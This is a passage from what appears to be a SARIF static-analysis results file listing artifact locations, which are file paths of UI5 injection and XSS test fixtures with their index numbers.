"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 168 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 169 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 170 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 173 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 174 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 177 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 178 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 182 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 183 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 186 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 187 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 190 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 191 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 194 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 195 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 196 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 198 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 199 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", - "uriBaseId" : "%SRCROOT%", - "index" : 200 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 201 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 203 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 205 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 207 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 208 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 211 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 212 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 213 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 215 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 217 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 218 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 221 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 224 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 225 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 226 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 229 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 230 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 232 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 233 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 234 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 237 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", - "uriBaseId" : "%SRCROOT%", - "index" : 238 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 239 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 240 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", - "uriBaseId" : "%SRCROOT%", - "index" : 241 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 245 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", - "uriBaseId" : "%SRCROOT%", - "index" : 246 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", - "uriBaseId" : "%SRCROOT%", - "index" : 247 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 248 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 249 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 250 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", - "uriBaseId" : "%SRCROOT%", - "index" : 251 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 252 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 253 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", - "uriBaseId" : "%SRCROOT%", - "index" : 254 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 255 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 256 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", - "uriBaseId" : "%SRCROOT%", - "index" : 257 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 258 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 259 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 260 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", - "uriBaseId" : "%SRCROOT%", - "index" : 261 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 262 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 263 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 264 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 265 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 268 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 269 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 270 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 272 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 273 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 274 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 277 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 278 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 279 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 281 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 282 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 283 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 286 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 287 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 288 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 290 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 291 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 292 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 293 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 294 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 295 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 296 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 297 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 298 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 299 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 300 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 301 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 302 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 303 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 304 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 305 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 306 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 307 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 308 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 309 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 310 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 312 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 313 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 314 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 316 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 317 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 318 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 320 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 321 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 322 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 324 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 325 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 326 - } - }, { - "location" : { - "uri" : 